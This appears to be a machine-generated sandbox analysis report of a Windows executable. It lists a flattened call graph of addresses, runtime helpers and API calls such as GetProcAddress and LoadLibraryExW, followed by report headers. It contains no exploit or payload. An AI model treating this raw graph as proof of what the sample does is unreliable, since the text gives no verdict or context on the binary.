17334->17337 17341 7ff7a6731395 17334->17341 17336 7ff7a67324d0 59 API calls 17335->17336 17344 7ff7a673135f __vcrt_freefls 17336->17344 17338 7ff7a6731050 98 API calls 17337->17338 17338->17344 17339 7ff7a673f5fc _fread_nolock 53 API calls 17339->17341 17340 7ff7a6731421 17340->15218 17341->17339 17343 7ff7a67313de 17341->17343 17341->17344 17342 7ff7a673f2ac 74 API calls 17342->17340 17345 7ff7a67324d0 59 API calls 17343->17345 17344->17340 17344->17342 17345->17344 17347 7ff7a6731b30 49 API calls 17346->17347 17348 7ff7a6733d60 17347->17348 17348->15220 17350 7ff7a67316aa 17349->17350 17351 7ff7a6731666 17349->17351 17350->15223 17351->17350 17352 7ff7a6732770 59 API calls 17351->17352 17353 7ff7a67316be 17352->17353 17353->15223 17355 7ff7a6737a30 57 API calls 17354->17355 17356 7ff7a67371c7 LoadLibraryExW 17355->17356 17357 7ff7a67371e4 __vcrt_freefls 17356->17357 17357->15244 17359 7ff7a6734970 17358->17359 17360 7ff7a6731b30 49 API calls 17359->17360 17361 7ff7a67349a2 17360->17361 17362 7ff7a67349ab 17361->17362 17365 7ff7a67349cb 17361->17365 17363 7ff7a6732770 59 API calls 17362->17363 17367 7ff7a67349c1 17363->17367 17364 7ff7a6734a22 17366 7ff7a6733d30 49 API calls 17364->17366 17365->17364 17368 7ff7a6733d30 49 API calls 17365->17368 17369 7ff7a6734a3b 17366->17369 17371 7ff7a673ad80 _wfindfirst32i64 8 API calls 17367->17371 17370 7ff7a67349ec 17368->17370 17372 7ff7a6734a59 17369->17372 17376 7ff7a6732770 59 API calls 17369->17376 17373 7ff7a6734a0a 17370->17373 17378 7ff7a6732770 59 API calls 17370->17378 17375 7ff7a67330be 17371->17375 17377 7ff7a67371b0 58 API calls 17372->17377 17443 7ff7a6733c40 17373->17443 17375->15323 17386 7ff7a6734ce0 17375->17386 17376->17372 17380 7ff7a6734a66 17377->17380 17378->17373 17381 7ff7a6734a8d 17380->17381 17382 7ff7a6734a6b 17380->17382 17449 7ff7a6733df0 GetProcAddress 17381->17449 17385 7ff7a6732620 57 API calls 17382->17385 17384 7ff7a67371b0 58 API calls 17384->17364 17385->17367 17387 7ff7a6736990 61 API calls 17386->17387 17389 7ff7a6734cf5 17387->17389 17388 7ff7a6734d10 17390 7ff7a6737a30 57 API calls 17388->17390 17389->17388 17391 7ff7a6732880 59 API calls 17389->17391 17392 7ff7a6734d54 17390->17392 17391->17388 17393 7ff7a6734d59 17392->17393 17394 7ff7a6734d70 17392->17394 17395 7ff7a6732770 59 API calls 17393->17395 17397 7ff7a6737a30 57 API calls 17394->17397 17396 7ff7a6734d65 17395->17396 17396->15325 17398 7ff7a6734da5 17397->17398 17401 7ff7a6731b30 49 API calls 17398->17401 17412 7ff7a6734daa __vcrt_freefls 17398->17412 17399 7ff7a6732770 59 API calls 17400 7ff7a6734f51 17399->17400 17400->15325 17402 7ff7a6734e27 17401->17402 17403 7ff7a6734e2e 17402->17403 17404 7ff7a6734e53 17402->17404 17406 7ff7a6732770 59 API calls 17403->17406 17405 7ff7a6737a30 57 API calls 17404->17405 17408 7ff7a6734e6c 17405->17408 17407 7ff7a6734e43 17406->17407 17407->15325 17408->17412 17556 7ff7a6734ac0 17408->17556 17412->17399 17413 7ff7a6734f3a 17412->17413 17413->15325 17415 7ff7a67346f7 17414->17415 17415->17415 17416 7ff7a6734720 17415->17416 17420 7ff7a6734737 __vcrt_freefls 17415->17420 17417 7ff7a6732770 59 API calls 17416->17417 17418 7ff7a673472c 17417->17418 17418->15327 17419 7ff7a673481b 17419->15327 17420->17419 17421 7ff7a6731780 59 API calls 17420->17421 17422 7ff7a67312b0 122 API calls 17420->17422 17423 7ff7a6732770 59 API calls 17420->17423 17421->17420 17422->17420 17423->17420 17425 7ff7a6734947 17424->17425 17426 7ff7a673485b 17424->17426 17425->15329 17426->17425 17426->17426 17427 7ff7a6731780 59 API calls 17426->17427 17428 7ff7a6732770 59 API calls 17426->17428 17427->17426 17428->17426 17444 7ff7a6733c4a 17443->17444 17445 7ff7a6737a30 57 API calls 17444->17445 17446 7ff7a6733c72 17445->17446 17447 7ff7a673ad80 _wfindfirst32i64 8 API calls 17446->17447 17448 7ff7a6733c9a 17447->17448 17448->17364 17448->17384 17450 7ff7a6733e18 17449->17450 17451 7ff7a6733e3b GetProcAddress 17449->17451 17453 7ff7a6732620 57 API calls 17450->17453 17451->17450 17452 7ff7a6733e60 GetProcAddress 17451->17452 17452->17450 17454 7ff7a6733e85 GetProcAddress 17452->17454 17455 7ff7a6733e2b 17453->17455 17454->17450 17456 7ff7a6733ead GetProcAddress 17454->17456 17455->17367 17456->17450 17457 7ff7a6733ed5 GetProcAddress 17456->17457 17457->17450 17458 7ff7a6733efd GetProcAddress 17457->17458 17459 7ff7a6733f19 17458->17459 17460 7ff7a6733f25 GetProcAddress 17458->17460 17459->17460 17461 7ff7a6733f4d GetProcAddress 17460->17461 17462 7ff7a6733f41 17460->17462 17463 7ff7a6733f69 17461->17463 17462->17461 17464 7ff7a6733f7d GetProcAddress 17463->17464 17465 7ff7a6733fa5 GetProcAddress 17463->17465 17464->17465 17466 7ff7a6733f99 17464->17466 17467 7ff7a6733fcd GetProcAddress 17465->17467 17468 7ff7a6733fc1 17465->17468 17466->17465 17469 7ff7a6733fe9 17467->17469 17470 7ff7a6733ff5 GetProcAddress 17467->17470 17468->17467 17469->17470 17471 7ff7a673401d GetProcAddress 17470->17471 17472 7ff7a6734011 17470->17472 17473 7ff7a6734039 17471->17473 17474 7ff7a6734045 GetProcAddress 17471->17474 17472->17471 17473->17474 17475 7ff7a673406d GetProcAddress 17474->17475 17476 7ff7a6734061 17474->17476 17477 7ff7a6734089 17475->17477 17478 7ff7a6734095 GetProcAddress 17475->17478 17476->17475 17477->17478 17560 7ff7a6734ada 17556->17560 17557 7ff7a673ad80 _wfindfirst32i64 8 API calls 17558 7ff7a6734cb0 17557->17558 17559 7ff7a6731780 59 API calls 17559->17560 17560->17559 17562 7ff7a6734bf3 17560->17562 17565 7ff7a6734cc9 17560->17565 17582 7ff7a6734c91 17560->17582 17590 7ff7a67456d0 17560->17590 17563 7ff7a6749184 _fread_nolock 37 API calls 17562->17563 17562->17582 17564 7ff7a6734c0a 17563->17564 17567 7ff7a6732770 59 API calls 17565->17567 17567->17582 17582->17557 17591 7ff7a6745700 17590->17591 17619 7ff7a67454d4 17591->17619 17688 7ff7a674a620 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 17687->17688 17689 7ff7a67490e1 17688->17689 17690 7ff7a674920c __FrameHandler3::FrameUnwindToEmptyState 45 API calls 17689->17690 17691 7ff7a6749101 17690->17691 17915 7ff7a6756fa0 17918 7ff7a6751730 17915->17918 17919 7ff7a675173d 17918->17919 17920 7ff7a6751782 17918->17920 17924 7ff7a674a6f4 17919->17924 17925 7ff7a674a705 FlsGetValue 17924->17925 17926 7ff7a674a720 FlsSetValue 17924->17926 17927 7ff7a674a71a 17925->17927 17929 7ff7a674a712 17925->17929 17928 7ff7a674a72d 17926->17928 17926->17929 17927->17926 17932 7ff7a674dd40 _get_daylight 11 API calls 17928->17932 17930 7ff7a674a718 17929->17930 17931 7ff7a674920c __FrameHandler3::FrameUnwindToEmptyState 45 API calls 17929->17931 17944 7ff7a6751404 17930->17944 17933 7ff7a674a795 17931->17933 17934 7ff7a674a73c 17932->17934 17935 7ff7a674a75a FlsSetValue 17934->17935 17936 7ff7a674a74a FlsSetValue 17934->17936 17937 7ff7a674a778 17935->17937 17938 7ff7a674a766 FlsSetValue 17935->17938 17939 7ff7a674a753 17936->17939 17941 7ff7a674a3c4 _get_daylight 11 API calls 17937->17941 17938->17939 17940 7ff7a6749e18 __free_lconv_mon 11 API calls 17939->17940 17940->17929 17942 7ff7a674a780 17941->17942 17943 7ff7a6749e18 __free_lconv_mon 11 API calls 17942->17943 17943->17930 17967 7ff7a6751674 17944->17967 17946 7ff7a6751439 17982 7ff7a6751104 17946->17982 17949 7ff7a674cacc _fread_nolock 12 API calls 17950 7ff7a6751467 17949->17950 17951 7ff7a675146f 17950->17951 17954 7ff7a675147e 17950->17954 17952 7ff7a6749e18 __free_lconv_mon 11 API calls 17951->17952 17953 7ff7a6751456 17952->17953 17953->17920 17954->17954 17989 7ff7a67517ac 17954->17989 17957 7ff7a675157a 17958 7ff7a6744444 _get_daylight 11 API calls 17957->17958 17959 7ff7a675157f 17958->17959 17962 7ff7a6749e18 __free_lconv_mon 11 API calls 17959->17962 17960 7ff7a67515d5 17961 7ff7a675163c 17960->17961 18000 7ff7a6750f34 17960->18000 17965 7ff7a6749e18 __free_lconv_mon 11 API calls 17961->17965 17962->17953 17963 7ff7a6751594 17963->17960 17966 7ff7a6749e18 __free_lconv_mon 11 API calls 17963->17966 17965->17953 17966->17960 17968 7ff7a6751697 17967->17968 17969 7ff7a67516a1 17968->17969 18015 7ff7a674f788 EnterCriticalSection 17968->18015 17971 7ff7a6751713 17969->17971 17974 7ff7a674920c __FrameHandler3::FrameUnwindToEmptyState 45 API calls 17969->17974 17971->17946 17976 7ff7a675172b 17974->17976 17978 7ff7a6751782 17976->17978 17979 7ff7a674a6f4 50 API calls 17976->17979 17978->17946 17980 7ff7a675176c 17979->17980 17981 7ff7a6751404 65 API calls 17980->17981 17981->17978 17983 7ff7a6744a1c 45 API calls 17982->17983 17984 7ff7a6751118 17983->17984 17985 7ff7a6751124 GetOEMCP 17984->17985 17986 7ff7a6751136 17984->17986 17988 7ff7a675114b 17985->17988 17987 7ff7a675113b GetACP 17986->17987 17986->17988 17987->17988 17988->17949 17988->17953 17990 7ff7a6751104 47 API calls 17989->17990 17992 7ff7a67517d9 17990->17992 17991 7ff7a675192f 17993 7ff7a673ad80 _wfindfirst32i64 8 API calls 17991->17993 17992->17991 17994 7ff7a6751816 IsValidCodePage 17992->17994 17997 7ff7a6751830 __scrt_get_show_window_mode 17992->17997 17995 7ff7a6751571 17993->17995 17994->17991 17996 7ff7a6751827 17994->17996 17995->17957 17995->17963 17996->17997 17998 7ff7a6751856 GetCPInfo 17996->17998 18016 7ff7a675121c 17997->18016 17998->17991 17998->17997 18087 7ff7a674f788 EnterCriticalSection 18000->18087 18017 7ff7a6751259 GetCPInfo 18016->18017 18018 7ff7a675134f 18016->18018 18017->18018 18024 7ff7a675126c 18017->18024 18019 7ff7a673ad80 _wfindfirst32i64 8 API calls 18018->18019 18020 7ff7a67513ee 18019->18020 18020->17991 18027 7ff7a6751f60 18024->18027 18026 7ff7a6756f04 54 API calls 18026->18018 18028 7ff7a6744a1c 45 API calls 18027->18028 18029 7ff7a6751fa2 18028->18029 18030 7ff7a674e7f0 _fread_nolock MultiByteToWideChar 18029->18030 18032 7ff7a6751fd8 18030->18032 18031 7ff7a6751fdf 18034 7ff7a673ad80 _wfindfirst32i64 8 API calls 18031->18034 18032->18031 18033 7ff7a674cacc _fread_nolock 12 API calls 18032->18033 18036 7ff7a675209c 18032->18036 18038 7ff7a6752008 __scrt_get_show_window_mode 18032->18038 18033->18038 18035 7ff7a67512e3 18034->18035 18042 7ff7a6756f04 18035->18042 18036->18031 18037 7ff7a6749e18 __free_lconv_mon 11 API calls 18036->18037 18037->18031 18038->18036 18039 7ff7a674e7f0 _fread_nolock MultiByteToWideChar 18038->18039 18040 7ff7a675207e 18039->18040 18040->18036 18041 7ff7a6752082 GetStringTypeW 18040->18041 18041->18036 18043 7ff7a6744a1c 45 API calls 18042->18043 18044 7ff7a6756f29 18043->18044 18047 7ff7a6756bd0 18044->18047 18048 7ff7a6756c11 18047->18048 18049 7ff7a674e7f0 _fread_nolock MultiByteToWideChar 18048->18049 18052 7ff7a6756c5b 18049->18052 18050 7ff7a6756ed9 18051 7ff7a673ad80 _wfindfirst32i64 8 API calls 18050->18051 18053 7ff7a6751316 18051->18053 18052->18050 18054 7ff7a674cacc _fread_nolock 12 API calls 18052->18054 18055 7ff7a6756d91 18052->18055 18057 7ff7a6756c93 18052->18057 18053->18026 18054->18057 18055->18050 18056 7ff7a6749e18 __free_lconv_mon 11 API calls 18055->18056 18056->18050 18057->18055 18058 7ff7a674e7f0 _fread_nolock MultiByteToWideChar 18057->18058 18059 7ff7a6756d06 18058->18059 18059->18055 18078 7ff7a674e18c 18059->18078 18062 7ff7a6756d51 18062->18055 18064 7ff7a674e18c __crtLCMapStringW 6 API calls 18062->18064 18063 7ff7a6756da2 18065 7ff7a674cacc _fread_nolock 12 API calls 18063->18065 18066 7ff7a6756e74 18063->18066 18068 7ff7a6756dc0 18063->18068 18064->18055 18065->18068 18066->18055 18067 7ff7a6749e18 __free_lconv_mon 11 API calls 18066->18067 18067->18055 18068->18055 18069 7ff7a674e18c __crtLCMapStringW 6 API calls 18068->18069 18070 7ff7a6756e40 18069->18070 18070->18066 18071 7ff7a6756e76 18070->18071 18072 7ff7a6756e60 18070->18072 18074 7ff7a674f0b8 WideCharToMultiByte 18071->18074 18073 7ff7a674f0b8 WideCharToMultiByte 18072->18073 18075 7ff7a6756e6e 18073->18075 18074->18075 18075->18066 18076 7ff7a6756e8e 18075->18076 18076->18055 18077 7ff7a6749e18 __free_lconv_mon 11 API calls 18076->18077 18077->18055 18079 7ff7a674ddb8 __crtLCMapStringW 5 API calls 18078->18079 18080 7ff7a674e1ca 18079->18080 18083 7ff7a674e1d2 18080->18083 18084 7ff7a674e278 18080->18084 18082 7ff7a674e23b LCMapStringW 18082->18083 18083->18055 18083->18062 18083->18063 18085 7ff7a674ddb8 __crtLCMapStringW 5 API calls 18084->18085 18086 7ff7a674e2a6 __crtLCMapStringW 18085->18086 18086->18082 18108 7ff7a674a4a0 18109 7ff7a674a4a5 18108->18109 18113 7ff7a674a4ba 18108->18113 18114 7ff7a674a4c0 18109->18114 18115 7ff7a674a502 18114->18115 18118 7ff7a674a50a 18114->18118 18116 7ff7a6749e18 __free_lconv_mon 11 API calls 18115->18116 18116->18118 18117 7ff7a6749e18 __free_lconv_mon 11 API calls 18119 7ff7a674a517 18117->18119 18118->18117 18120 7ff7a6749e18 __free_lconv_mon 11 API calls 18119->18120 18121 7ff7a674a524 18120->18121 18122 7ff7a6749e18 __free_lconv_mon 11 API calls 18121->18122 18123 7ff7a674a531 18122->18123 18124 7ff7a6749e18 __free_lconv_mon 11 API calls 18123->18124 18125 7ff7a674a53e 18124->18125 18126 7ff7a6749e18 __free_lconv_mon 11 API calls 18125->18126 18127 7ff7a674a54b 18126->18127 18128 7ff7a6749e18 __free_lconv_mon 11 API calls 18127->18128 18129 7ff7a674a558 18128->18129 18130 7ff7a6749e18 __free_lconv_mon 11 API calls 18129->18130 18131 7ff7a674a565 18130->18131 18132 7ff7a6749e18 __free_lconv_mon 11 API calls 18131->18132 18133 7ff7a674a575 18132->18133 18134 7ff7a6749e18 __free_lconv_mon 11 API calls 18133->18134 18135 7ff7a674a585 18134->18135 18140 7ff7a674a364 18135->18140 18154 7ff7a674f788 EnterCriticalSection 18140->18154 18231 7ff7a673b0b0 18232 7ff7a673b0c0 18231->18232 18248 7ff7a674579c 18232->18248 18234 7ff7a673b0cc 18254 7ff7a673b3b8 18234->18254 18236 7ff7a673b69c 7 API calls 18237 7ff7a673b165 18236->18237 18238 7ff7a673b0e4 _RTC_Initialize 18246 7ff7a673b139 18238->18246 18259 7ff7a673b568 18238->18259 18240 7ff7a673b0f9 18262 7ff7a6747e6c 18240->18262 18246->18236 18247 7ff7a673b155 18246->18247 18249 7ff7a67457ad 18248->18249 18250 7ff7a67457b5 18249->18250 18251 7ff7a6744444 _get_daylight 11 API calls 18249->18251 18250->18234 18252 7ff7a67457c4 18251->18252 18253 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 18252->18253 18253->18250 18255 7ff7a673b3c9 18254->18255 18258 7ff7a673b3ce __scrt_release_startup_lock 18254->18258 18256 7ff7a673b69c 7 API calls 18255->18256 18255->18258 18257 7ff7a673b442 18256->18257 18258->18238 18287 7ff7a673b52c 18259->18287 18261 7ff7a673b571 18261->18240 18263 7ff7a6747e8c 18262->18263 18285 7ff7a673b105 18262->18285 18264 7ff7a6747eaa GetModuleFileNameW 18263->18264 18265 7ff7a6747e94 18263->18265 18269 7ff7a6747ed5 18264->18269 18266 7ff7a6744444 _get_daylight 11 API calls 18265->18266 18267 7ff7a6747e99 18266->18267 18268 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 18267->18268 18268->18285 18270 7ff7a6747e0c 11 API calls 18269->18270 18271 7ff7a6747f15 18270->18271 18272 7ff7a6747f1d 18271->18272 18273 7ff7a6747f35 18271->18273 18274 7ff7a6744444 _get_daylight 11 API calls 18272->18274 18277 7ff7a6747f57 18273->18277 18279 7ff7a6747f9c 18273->18279 18280 7ff7a6747f83 18273->18280 18275 7ff7a6747f22 18274->18275 18276 7ff7a6749e18 __free_lconv_mon 11 API calls 18275->18276 18276->18285 18278 7ff7a6749e18 __free_lconv_mon 11 API calls 18277->18278 18278->18285 18283 7ff7a6749e18 __free_lconv_mon 11 API calls 18279->18283 18281 7ff7a6749e18 __free_lconv_mon 11 API calls 18280->18281 18282 7ff7a6747f8c 18281->18282 18284 7ff7a6749e18 __free_lconv_mon 11 API calls 18282->18284 18283->18277 18284->18285 18285->18246 18286 7ff7a673b63c InitializeSListHead 18285->18286 18288 7ff7a673b546 18287->18288 18290 7ff7a673b53f 18287->18290 18291 7ff7a6748eec 18288->18291 18290->18261 18294 7ff7a6748b28 18291->18294 18301 7ff7a674f788 EnterCriticalSection 18294->18301 17692 7ff7a67487b9 17693 7ff7a67490d8 45 API calls 17692->17693 17694 7ff7a67487be 17693->17694 17695 7ff7a67487e5 GetModuleHandleW 17694->17695 17696 7ff7a674882f 17694->17696 17695->17696 17702 7ff7a67487f2 17695->17702 17704 7ff7a67486bc 17696->17704 17702->17696 17718 7ff7a67488e0 GetModuleHandleExW 17702->17718 17724 7ff7a674f788 EnterCriticalSection 17704->17724 17719 7ff7a674893d 17718->17719 17720 7ff7a6748914 GetProcAddress 17718->17720 17722 7ff7a6748949 17719->17722 17723 7ff7a6748942 FreeLibrary 17719->17723 17721 7ff7a6748926 17720->17721 17721->17719 17722->17696 17723->17722 18956 7ff7a6748a50 18959 7ff7a67489d0 18956->18959 18966 7ff7a674f788 EnterCriticalSection 18959->18966 14685 7ff7a674e8dc 14686 7ff7a674eace 14685->14686 14688 7ff7a674e91e _isindst 14685->14688 14737 7ff7a6744444 14686->14737 14688->14686 14691 7ff7a674e99e _isindst 14688->14691 14706 7ff7a67553b4 14691->14706 14696 7ff7a674eafa 14749 7ff7a6749dd0 IsProcessorFeaturePresent 14696->14749 14703 7ff7a674e9fb 14705 7ff7a674eabe 14703->14705 14730 7ff7a67553f8 14703->14730 14740 7ff7a673ad80 14705->14740 14707 7ff7a67553c3 14706->14707 14708 7ff7a674e9bc 14706->14708 14753 7ff7a674f788 EnterCriticalSection 14707->14753 14712 7ff7a67547b8 14708->14712 14713 7ff7a674e9d1 14712->14713 14714 7ff7a67547c1 14712->14714 14713->14696 14718 7ff7a67547e8 14713->14718 14715 7ff7a6744444 _get_daylight 11 API calls 14714->14715 14716 7ff7a67547c6 14715->14716 14754 7ff7a6749db0 14716->14754 14719 7ff7a67547f1 14718->14719 14723 7ff7a674e9e2 14718->14723 14720 7ff7a6744444 _get_daylight 11 API calls 14719->14720 14721 7ff7a67547f6 14720->14721 14722 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 14721->14722 14722->14723 14723->14696 14724 7ff7a6754818 14723->14724 14725 7ff7a674e9f3 14724->14725 14726 7ff7a6754821 14724->14726 14725->14696 14725->14703 14727 7ff7a6744444 _get_daylight 11 API calls 14726->14727 14728 7ff7a6754826 14727->14728 14729 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 14728->14729 14729->14725 14835 7ff7a674f788 EnterCriticalSection 14730->14835 14836 7ff7a674a798 GetLastError 14737->14836 14739 7ff7a674444d 14739->14705 14741 7ff7a673ad89 14740->14741 14742 7ff7a673ad94 14741->14742 14743 7ff7a673ae40 IsProcessorFeaturePresent 14741->14743 14744 7ff7a673ae58 14743->14744 14853 7ff7a673b034 RtlCaptureContext 14744->14853 14750 7ff7a6749de3 14749->14750 14858 7ff7a6749ae4 14750->14858 14756 7ff7a6749c48 14754->14756 14757 7ff7a6749c73 14756->14757 14760 7ff7a6749ce4 14757->14760 14759 7ff7a6749c9a 14768 7ff7a6749a2c 14760->14768 14763 7ff7a6749d1f 14763->14759 14766 7ff7a6749dd0 _wfindfirst32i64 17 API calls 14767 7ff7a6749daf 14766->14767 14769 7ff7a6749a48 GetLastError 14768->14769 14770 7ff7a6749a83 14768->14770 14771 7ff7a6749a58 14769->14771 14770->14763 14774 7ff7a6749a98 14770->14774 14777 7ff7a674a860 14771->14777 14775 7ff7a6749acc 14774->14775 14776 7ff7a6749ab4 GetLastError SetLastError 14774->14776 14775->14763 14775->14766 14776->14775 14778 7ff7a674a89a FlsSetValue 14777->14778 14779 7ff7a674a87f FlsGetValue 14777->14779 14780 7ff7a674a8a7 14778->14780 14782 7ff7a6749a73 SetLastError 14778->14782 14781 7ff7a674a894 14779->14781 14779->14782 14794 7ff7a674dd40 14780->14794 14781->14778 14782->14770 14785 7ff7a674a8d4 FlsSetValue 14788 7ff7a674a8e0 FlsSetValue 14785->14788 14789 7ff7a674a8f2 14785->14789 14786 7ff7a674a8c4 FlsSetValue 14787 7ff7a674a8cd 14786->14787 14801 7ff7a6749e18 14787->14801 14788->14787 14807 7ff7a674a3c4 14789->14807 14799 7ff7a674dd51 _get_daylight 14794->14799 14795 7ff7a674dda2 14798 7ff7a6744444 _get_daylight 10 API calls 14795->14798 14796 7ff7a674dd86 HeapAlloc 14797 7ff7a674a8b6 14796->14797 14796->14799 14797->14785 14797->14786 14798->14797 14799->14795 14799->14796 14812 7ff7a67526b0 14799->14812 14802 7ff7a6749e1d RtlFreeHeap 14801->14802 14803 7ff7a6749e4c 14801->14803 14802->14803 14804 7ff7a6749e38 GetLastError 14802->14804 14803->14782 14805 7ff7a6749e45 __free_lconv_mon 14804->14805 14806 7ff7a6744444 _get_daylight 9 API calls 14805->14806 14806->14803 14821 7ff7a674a29c 14807->14821 14815 7ff7a67526f0 14812->14815 14820 7ff7a674f788 EnterCriticalSection 14815->14820 14833 7ff7a674f788 EnterCriticalSection 14821->14833 14837 7ff7a674a7d9 FlsSetValue 14836->14837 14841 7ff7a674a7bc 14836->14841 14838 7ff7a674a7eb 14837->14838 14850 7ff7a674a7c9 14837->14850 14840 7ff7a674dd40 _get_daylight 5 API calls 14838->14840 14839 7ff7a674a845 SetLastError 14839->14739 14842 7ff7a674a7fa 14840->14842 14841->14837 14841->14850 14843 7ff7a674a818 FlsSetValue 14842->14843 14844 7ff7a674a808 FlsSetValue 14842->14844 14846 7ff7a674a824 FlsSetValue 14843->14846 14847 7ff7a674a836 14843->14847 14845 7ff7a674a811 14844->14845 14848 7ff7a6749e18 __free_lconv_mon 5 API calls 14845->14848 14846->14845 14849 7ff7a674a3c4 _get_daylight 5 API calls 14847->14849 14848->14850 14851 7ff7a674a83e 14849->14851 14850->14839 14852 7ff7a6749e18 __free_lconv_mon 5 API calls 14851->14852 14852->14839 14854 7ff7a673b04e RtlLookupFunctionEntry 14853->14854 14855 7ff7a673ae6b 14854->14855 14856 7ff7a673b064 RtlVirtualUnwind 14854->14856 14857 7ff7a673ae00 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 14855->14857 14856->14854 14856->14855 14859 7ff7a6749b1e _wfindfirst32i64 __scrt_get_show_window_mode 14858->14859 14860 7ff7a6749b46 RtlCaptureContext RtlLookupFunctionEntry 14859->14860 14861 7ff7a6749bb6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14860->14861 14862 7ff7a6749b80 RtlVirtualUnwind 14860->14862 14863 7ff7a6749c08 _wfindfirst32i64 14861->14863 14862->14861 14864 7ff7a673ad80 _wfindfirst32i64 8 API calls 14863->14864 14865 7ff7a6749c27 GetCurrentProcess TerminateProcess 14864->14865 18321 7ff7a67594de 18323 7ff7a67594ee 18321->18323 18325 7ff7a67442f8 LeaveCriticalSection 18323->18325 18984 7ff7a6759664 18987 7ff7a67442f8 LeaveCriticalSection 18984->18987 17735 7ff7a673a370 17736 7ff7a673a39e 17735->17736 17737 7ff7a673a385 17735->17737 17737->17736 17739 7ff7a674cacc 12 API calls 17737->17739 17738 7ff7a673a3fc 17739->17738 18334 7ff7a67507f0 18345 7ff7a6756764 18334->18345 18346 7ff7a6756771 18345->18346 18347 7ff7a6749e18 __free_lconv_mon 11 API calls 18346->18347 18348 7ff7a675678d 18346->18348 18347->18346 18349 7ff7a6749e18 __free_lconv_mon 11 API calls 18348->18349 18350 7ff7a67507f9 18348->18350 18349->18348 18351 7ff7a674f788 EnterCriticalSection 18350->18351 18352 7ff7a674b9f0 18363 7ff7a674f788 EnterCriticalSection 18352->18363 18378 7ff7a67596f9 18379 7ff7a6759708 18378->18379 18380 7ff7a6759712 18378->18380 18382 7ff7a674f7e8 LeaveCriticalSection 18379->18382 19314 7ff7a6744290 19315 7ff7a674429b 19314->19315 19323 7ff7a674e354 19315->19323 19336 7ff7a674f788 EnterCriticalSection 19323->19336 17740 7ff7a6746714 17741 7ff7a674677b 17740->17741 17742 7ff7a6746742 17740->17742 17741->17742 17744 7ff7a6746780 FindFirstFileExW 17741->17744 17743 7ff7a6744444 _get_daylight 11 API calls 17742->17743 17745 7ff7a6746747 17743->17745 17746 7ff7a67467e9 17744->17746 17747 7ff7a67467a2 GetLastError 17744->17747 17748 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 17745->17748 17800 7ff7a6746984 17746->17800 17750 7ff7a67467d9 17747->17750 17751 7ff7a67467ad 17747->17751 17752 7ff7a6746752 17748->17752 17753 7ff7a6744444 _get_daylight 11 API calls 17750->17753 17751->17750 17756 7ff7a67467c9 17751->17756 17757 7ff7a67467b7 17751->17757 17759 7ff7a673ad80 _wfindfirst32i64 8 API calls 17752->17759 17753->17752 17755 7ff7a6746984 _wfindfirst32i64 10 API calls 17760 7ff7a674680f 17755->17760 17758 7ff7a6744444 _get_daylight 11 API calls 17756->17758 17757->17750 17761 7ff7a67467bc 17757->17761 17758->17752 17762 7ff7a6746766 17759->17762 17763 7ff7a6746984 _wfindfirst32i64 10 API calls 17760->17763 17764 7ff7a6744444 _get_daylight 11 API calls 17761->17764 17765 7ff7a674681d 17763->17765 17764->17752 17766 7ff7a674f924 _wfindfirst32i64 37 API calls 17765->17766 17767 7ff7a674683b 17766->17767 17767->17752 17768 7ff7a6746847 17767->17768 17769 7ff7a6749dd0 _wfindfirst32i64 17 API calls 17768->17769 17770 7ff7a674685b 17769->17770 17771 7ff7a6746885 17770->17771 17774 7ff7a67468c4 FindNextFileW 17770->17774 17772 7ff7a6744444 _get_daylight 11 API calls 17771->17772 17773 7ff7a674688a 17772->17773 17775 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 17773->17775 17776 7ff7a6746914 17774->17776 17777 7ff7a67468d3 GetLastError 17774->17777 17778 7ff7a6746895 17775->17778 17779 7ff7a6746984 _wfindfirst32i64 10 API calls 17776->17779 17780 7ff7a6746907 17777->17780 17781 7ff7a67468de 17777->17781 17786 7ff7a673ad80 _wfindfirst32i64 8 API calls 17778->17786 17783 7ff7a674692c 17779->17783 17782 7ff7a6744444 _get_daylight 11 API calls 17780->17782 17781->17780 17784 7ff7a67468fa 17781->17784 17785 7ff7a67468e8 17781->17785 17782->17778 17787 7ff7a6746984 _wfindfirst32i64 10 API calls 17783->17787 17789 7ff7a6744444 _get_daylight 11 API calls 17784->17789 17785->17780 17788 7ff7a67468ed 17785->17788 17790 7ff7a67468a8 17786->17790 17791 7ff7a674693a 17787->17791 17793 7ff7a6744444 _get_daylight 11 API calls 17788->17793 17789->17778 17792 7ff7a6746984 _wfindfirst32i64 10 API calls 17791->17792 17794 7ff7a6746948 17792->17794 17793->17778 17795 7ff7a674f924 _wfindfirst32i64 37 API calls 17794->17795 17796 7ff7a6746966 17795->17796 17796->17778 17797 7ff7a674696e 17796->17797 17798 7ff7a6749dd0 _wfindfirst32i64 17 API calls 17797->17798 17799 7ff7a6746982 17798->17799 17801 7ff7a674699c 17800->17801 17802 7ff7a67469a2 FileTimeToSystemTime 17800->17802 17801->17802 17804 7ff7a67469c7 17801->17804 17803 7ff7a67469b1 SystemTimeToTzSpecificLocalTime 17802->17803 17802->17804 17803->17804 17805 7ff7a673ad80 _wfindfirst32i64 8 API calls 17804->17805 17806 7ff7a6746801 17805->17806 17806->17755

                                                                                                                        Executed Functions

                                                                                                                        Function 00007FF7A6754E20 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334timeCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
